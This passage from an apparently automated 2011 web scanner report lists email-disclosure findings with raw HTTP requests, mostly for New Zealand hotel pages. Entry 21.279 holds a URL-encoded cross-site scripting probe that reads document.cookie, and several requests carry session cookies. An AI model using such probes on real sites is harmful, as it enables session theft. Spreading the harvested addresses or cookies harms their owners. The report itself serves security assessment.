401516&nightlyPrice=142.6700000000000%2CUSD&rooms[0].numberOfAdults=2&hotelId=113791&validate=false&dateful=false",
serverSideTab: "description",
pageType: "landing",
feedbackHref: "mailto:userexperience@hotels.com?subject=Site feedback: {0};POS: en_US",
pushpinImg: "/images/static/map/map_pin_hotel_active_us.png",
googleClientId: "gme-expedia",
queryFormMVTVariant: false
});
$.formatter.extendGlobal
...[SNIP]...

21.276. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

lokesh.dhakar@gmail.com

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:24 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

21.277. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js?ver=0.0.8a HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:02 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Sat, 14 Aug 2010 02:41:33 GMT
ETag: "aa80bb-1bcb-48dbf898f9140"
Accept-Ranges: bytes
Content-Length: 7115
Connection: close
Content-Type: application/x-javascript

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

21.278. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ligattsecurity.com
Path:	/wp-content/themes/elite-force/js/custom.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /wp-content/themes/elite-force/js/custom.js?ver=1.0 HTTP/1.1
Host: www.ligattsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296574377227827; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:33:02 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Sat, 14 Aug 2010 02:41:34 GMT
ETag: "aa80bc-759c-48dbf899ed380"
Accept-Ranges: bytes
Content-Length: 30108
Connection: close
Content-Type: application/x-javascript

jQuery.noConflict();

jQuery(document).ready(function () {

//Loading Thumbs
jQuery('.entry-portfolio-img a ').each(

function () {
var img_path = jQuery(this).attr('title'
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.279. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

Issue detail

The following email address was disclosed in the response:

webmaster@mensfitness.com

Request

Response

21.280. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneaucklandcity/index.html

Issue detail

The following email addresses were disclosed in the response:

copthorne.anzac@millenniumhotels.co.nz
copthorne.aucklandcity@millenniumhotels.co.nz

Request

GET /copthorneaucklandcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:54 GMT
ETag: "147bb-c926-2222abd2"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="copthorne.anzac@millenniumhotels.co.nz" target="_self"
href="mailto:copthorne.aucklandcity@millenniumhotels.co.nz">
...[SNIP]...

21.281. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornebayofislands/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.bayofislands@millenniumhotels.co.nz

Request

GET /copthornebayofislands/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:52 GMT
ETag: "20d1d-caa1-74daf70a"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="copthorne.bayofislands@millenniumhotels.co.nz" target="_self"
href="mailto:copthorne.bayofislands@millenniumhotels.co.nz">
...[SNIP]...

21.282. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchairport/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.commodore@millenniumhotels.co.nz

Request

GET /copthornechristchurchairport/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:52 GMT
ETag: "16e5c-c8c7-4b76b63c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="copthorne.commodore@millenniumhotels.co.nz" target="_self"
href="mailto:copthorne.commodore@millenniumhotels.co.nz">
...[SNIP]...

21.283. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchcentral/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.central@millenniumhotels.co.nz

Request

GET /copthornechristchurchcentral/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:04:39 GMT
ETag: "1eda8-ca04-9d826400"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.central@millenniumhotels.co.nz" target="_self"
title="copthorne.central@millenniumhotels.co.nz">
...[SNIP]...

21.284. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornechristchurchcity/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.durham@millenniumhotels.co.nz

Request

GET /copthornechristchurchcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:42 GMT
ETag: "206b3-c94a-216db623"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.durham@millenniumhotels.co.nz" target="_self"
title="copthorne.durham@millenniumhotels.co.nz">
...[SNIP]...

21.285. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornedurhamstreet/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.durham@millenniumhotels.co.nz

Request

GET /copthornedurhamstreet/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:39 GMT
ETag: "21a0c-cb7e-741c3aea"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.durham@millenniumhotels.co.nz" target="_self"
title="copthorne.durham@millenniumhotels.co.nz">
...[SNIP]...

21.286. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneharbourcity/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.harbourcity@millenniumhotels.co.nz

Request

GET /copthorneharbourcity/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:35 GMT
ETag: "21714-f14e-21041790"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.harbourcity@millenniumhotels.co.nz" target="_self"
title="copthorne.harbourcity@millenniumhotels.co.nz">
...[SNIP]...

21.287. http://www.millenniumhotels.co.nz/copthornehokianga/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornehokianga/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.hokianga@millenniumhotels.co.nz

Request

GET /copthornehokianga/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:31 GMT
ETag: "21643-c810-73a3d429"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.hokianga@millenniumhotels.co.nz" target="_self"
title="copthorne.hokianga@millenniumhotels.co.nz">
...[SNIP]...

21.288. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornemarlborough/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.marlborough@millenniumhotels.co.nz

Request

GET /copthornemarlborough/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:29 GMT
ETag: "2100c-c7ce-20a0abe7"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.marlborough@millenniumhotels.co.nz" target="_self"
title="copthorne.marlborough@millenniumhotels.co.nz">
...[SNIP]...

21.289. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornenewplymouth/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.newplymouth@millenniumhotels.co.nz

Request

GET /copthornenewplymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:26 GMT
ETag: "217be-c7ca-20754781"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.newplymouth@millenniumhotels.co.nz" target="_self"
title="copthorne.newplymouth@millenniumhotels.co.nz">
...[SNIP]...

21.290. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthorneorientalbay/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.orientalbay@millenniumhotels.co.nz

Request

GET /copthorneorientalbay/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:23 GMT
ETag: "21b5a-c9fa-731f81a6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.orientalbay@millenniumhotels.co.nz" target="_self"
title="copthorne.orientalbay@millenniumhotels.co.nz">
...[SNIP]...

21.291. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornequeenstownlakefront/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.lakefront@millenniumhotels.co.nz

Request

GET /copthornequeenstownlakefront/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:04:12 GMT
ETag: "21d5f-c960-9be441ef"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:copthorne.lakefront@millenniumhotels.co.nz" target="_self"
title="copthorne.lakefront@millenniumhotels.co.nz">
...[SNIP]...

21.292. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/copthornewairarapa/index.html

Issue detail

The following email address was disclosed in the response:

reservations@solway.co.nz

Request

GET /copthornewairarapa/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:18 GMT
ETag: "256fd-c9f0-496b6211"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations@solway.co.nz" target="_self" title="reservations@solway.co.nz">
...[SNIP]...

21.293. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateauckland/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.parnell@millenniumhotels.co.nz

Request

GET /kingsgateauckland/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:04:08 GMT
ETag: "28ff9-c9ac-723ead7f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.parnell@millenniumhotels.co.nz" target="_self"
title="kingsgate.parnell@millenniumhotels.co.nz">
...[SNIP]...

21.294. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatedunedin/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.dunedin@millenniumhotels.co.nz

Request

GET /kingsgatedunedin/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:04:05 GMT
ETag: "21804-ca24-1f35cc65"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.dunedin@millenniumhotels.co.nz" target="_self"
title="kingsgate.dunedin@millenniumhotels.co.nz">
...[SNIP]...

21.295. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgategreymouth/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.greymouth@millenniumhotels.co.nz

Request

GET /kingsgategreymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:04:04 GMT
ETag: "27548-c94b-489824eb"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.greymouth@millenniumhotels.co.nz" target="_self"
title="kingsgate.greymouth@millenniumhotels.co.nz">
...[SNIP]...

21.296. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatehamilton/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.hamilton@millenniumhotels.co.nz

Request

GET /kingsgatehamilton/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:03:51 GMT
ETag: "22466-c86a-9aadd629"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.hamilton@millenniumhotels.co.nz" target="_self"
title="kingsgate.hamilton@millenniumhotels.co.nz">
...[SNIP]...

21.297. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateoamaru/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.oamaru@millenniumhotels.co.nz

Request

GET /kingsgateoamaru/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:55 GMT
ETag: "23b3e-c95f-1e9f1e2d"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.oamaru@millenniumhotels.co.nz" target="_self"
title="kingsgate.oamaru@millenniumhotels.co.nz">
...[SNIP]...

21.298. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatepaihia/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.paihia@millenniumhotels.co.nz

Request

GET /kingsgatepaihia/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:52 GMT
ETag: "27e8c-c68b-1e769633"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.paihia@millenniumhotels.co.nz" target="_self"
title="kingsgate.paihia@millenniumhotels.co.nz">
...[SNIP]...

21.299. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatepalmerstonnorth/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.palmerston@millenniumhotels.co.nz

Request

GET /kingsgatepalmerstonnorth/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:50 GMT
ETag: "28ae6-c7b0-1e4f7c6f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.palmerston@millenniumhotels.co.nz" target="_self"
title="kingsgate.palmerston@millenniumhotels.co.nz">
...[SNIP]...

21.300. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatequeenstown/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.queenstown@millenniumhotels.co.nz

Request

GET /kingsgatequeenstown/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:46 GMT
ETag: "225a9-c792-70eb2b6f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51090

